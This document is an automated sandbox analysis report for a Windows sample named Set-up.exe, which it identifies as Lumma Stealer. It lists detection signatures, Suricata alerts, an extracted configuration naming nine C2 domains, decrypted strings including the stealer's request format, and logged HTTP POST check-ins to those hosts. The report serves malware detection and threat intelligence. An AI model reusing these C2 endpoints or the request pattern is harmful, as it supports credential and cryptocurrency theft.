Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1532477
MD5:	4b923f3600f76ea3fcf20959d94369ac
SHA1:	b79ce50dcabc145555a36e7d97f341644107157b
SHA256:	b80b75d889d42db1bbd9bc8b748c5c9390bb015286931579c1bcac7562de6a56
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 1012 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 4B923F3600F76EA3FCF20959D94369AC)

WerFault.exe (PID: 1184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 1600 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["sippymroat.cfd", "mathcucom.sbs", "ehticsprocw.sbs", "condifendteu.sbs", "drawwyobstacw.sbs", "resinedyw.sbs", "enlargkiw.sbs", "allocatinow.sbs", "vennurviot.sbs"], "Build id": "BVnUqo--@aboba45"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x5471f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:13.803098+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49731	188.114.97.3	443	TCP
2024-10-13T11:42:14.760733+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49732	188.114.96.3	443	TCP
2024-10-13T11:42:15.827479+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49733	172.67.152.13	443	TCP
2024-10-13T11:42:16.767536+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49734	104.21.77.78	443	TCP
2024-10-13T11:42:18.000399+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49735	172.67.140.193	443	TCP
2024-10-13T11:42:18.937149+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49737	104.21.30.221	443	TCP
2024-10-13T11:42:19.886594+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49741	172.67.141.136	443	TCP
2024-10-13T11:42:20.873314+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49743	188.114.96.3	443	TCP
2024-10-13T11:42:23.168391+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49746	104.21.53.8	443	TCP
2024-10-13T11:42:24.345642+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49747	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:13.803098+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49731	188.114.97.3	443	TCP
2024-10-13T11:42:14.760733+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49732	188.114.96.3	443	TCP
2024-10-13T11:42:15.827479+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49733	172.67.152.13	443	TCP
2024-10-13T11:42:16.767536+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49734	104.21.77.78	443	TCP
2024-10-13T11:42:18.000399+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49735	172.67.140.193	443	TCP
2024-10-13T11:42:18.937149+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49737	104.21.30.221	443	TCP
2024-10-13T11:42:19.886594+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49741	172.67.141.136	443	TCP
2024-10-13T11:42:20.873314+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49743	188.114.96.3	443	TCP
2024-10-13T11:42:23.168391+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49746	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:24.345642+0200	2049812	1	A Network Trojan was detected	192.168.2.4	49747	104.21.53.8	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:19.460477+0200	2056559	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	172.67.141.136	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:20.429036+0200	2056557	1	Domain Observed Used for C2 Detected	192.168.2.4	49743	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:18.521222+0200	2056561	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	104.21.30.221	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:15.301012+0200	2056567	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	172.67.152.13	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:14.310273+0200	2056571	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:16.329296+0200	2056565	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.77.78	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:17.561594+0200	2056563	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	172.67.140.193	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:14.762853+0200	2056568	1	Domain Observed Used for C2 Detected	192.168.2.4	53988	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:18.960890+0200	2056558	1	Domain Observed Used for C2 Detected	192.168.2.4	63734	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:19.899655+0200	2056556	1	Domain Observed Used for C2 Detected	192.168.2.4	49501	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:18.026733+0200	2056560	1	Domain Observed Used for C2 Detected	192.168.2.4	55421	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:14.795220+0200	2056566	1	Domain Observed Used for C2 Detected	192.168.2.4	50289	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:13.808579+0200	2056570	1	Domain Observed Used for C2 Detected	192.168.2.4	58518	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:15.834870+0200	2056564	1	Domain Observed Used for C2 Detected	192.168.2.4	63242	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:16.813607+0200	2056562	1	Domain Observed Used for C2 Detected	192.168.2.4	63926	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T11:42:22.179172+0200	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49745	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: Set-up.exe.1012.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["sippymroat.cfd", "mathcucom.sbs", "ehticsprocw.sbs", "condifendteu.sbs", "drawwyobstacw.sbs", "resinedyw.sbs", "enlargkiw.sbs", "allocatinow.sbs", "vennurviot.sbs"], "Build id": "BVnUqo--@aboba45"}

Multi AV Scanner detection for domain / URL

Source: vennurviot.sbs	Virustotal: Detection: 16%	Perma Link
Source: mathcucom.sbs	Virustotal: Detection: 19%	Perma Link
Source: sergei-esenin.com	Virustotal: Detection: 17%	Perma Link
Source: https://vennurviot.sbs/	Virustotal: Detection: 17%	Perma Link
Source: mathcucom.sbs	Virustotal: Detection: 19%	Perma Link
Source: https://ehticsprocw.sbs/pi	Virustotal: Detection: 11%	Perma Link
Source: https://vennurviot.sbs/api	Virustotal: Detection: 17%	Perma Link
Source: https://enlargkiw.sbs/	Virustotal: Detection: 17%	Perma Link
Source: https://sergei-esenin.com/r	Virustotal: Detection: 16%	Perma Link

Multi AV Scanner detection for submitted file

Source: Set-up.exe	ReversingLabs: Detection: 34%
Source: Set-up.exe	Virustotal: Detection: 41%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 83.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: drawwyobstacw.sbs
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: condifendteu.sbs
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: ehticsprocw.sbs
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: vennurviot.sbs
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: resinedyw.sbs
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: enlargkiw.sbs
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: allocatinow.sbs
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: mathcucom.sbs
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sippymroat.cfd
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2124509121.00000000029D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: BVnUqo--@aboba45

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49747 version: TLS 1.2

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: Set-up.exe

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	0_2_029D7032
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp word ptr [ebp+ecx+00h], 0000h	0_2_029F2682
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp word ptr [ebx+edx], 0000h	0_2_029F2682
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, byte ptr [esi]	0_2_029FD6A2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	0_2_029F7792
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_029FF712
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [ecx], al	0_2_029FC4A3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	0_2_029EE412
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28D9FA8Bh]	0_2_029E2407
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov ecx, eax	0_2_029E145C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov esi, edx	0_2_029F9444
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_02A15452
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebp+04h]	0_2_029E05C2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi]	0_2_02A0C562
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	0_2_029E0542
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then xor byte ptr [esp+edx+0Ch], dl	0_2_02A0F542
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000F2h]	0_2_029F0A92
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_029DEAC2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_029EEA12
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov edx, ecx	0_2_029FEA52
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 21912799h	0_2_029DFA78

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.4:63926 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.4:63734 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.4:63242 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.4:55421 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.4:49501 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.4:53988 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.4:49741 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.4:50289 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.4:49735 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.4:49737 -> 104.21.30.221:443
Source: Network traffic	Suricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.4:49732 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.4:49734 -> 104.21.77.78:443
Source: Network traffic	Suricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.4:49733 -> 172.67.152.13:443
Source: Network traffic	Suricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.4:58518 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 172.67.152.13:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.152.13:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.141.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 104.21.30.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.30.221:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.77.78:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.77.78:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49745 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49747 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49746 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: sippymroat.cfd
Source: Malware configuration extractor	URLs: mathcucom.sbs
Source: Malware configuration extractor	URLs: ehticsprocw.sbs
Source: Malware configuration extractor	URLs: condifendteu.sbs
Source: Malware configuration extractor	URLs: drawwyobstacw.sbs
Source: Malware configuration extractor	URLs: resinedyw.sbs
Source: Malware configuration extractor	URLs: enlargkiw.sbs
Source: Malware configuration extractor	URLs: allocatinow.sbs
Source: Malware configuration extractor	URLs: vennurviot.sbs

Source: Joe Sandbox View	IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sippymroat.cfd
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mathcucom.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enlargkiw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resinedyw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vennurviot.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ehticsprocw.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condifendteu.sbs
